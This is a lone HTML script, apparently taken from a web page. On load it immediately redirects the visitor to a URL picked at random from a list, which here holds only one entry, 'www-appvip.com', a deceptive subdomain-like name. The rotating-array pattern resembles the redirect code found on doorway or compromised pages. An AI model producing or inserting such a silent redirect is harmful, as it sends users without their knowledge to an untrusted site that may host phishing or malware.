<script>
      let domain = [
        "https://www-appvip.com",
		
      ];
      window.location = domain[Math.floor(Math.random() * domain.length)];
    </script>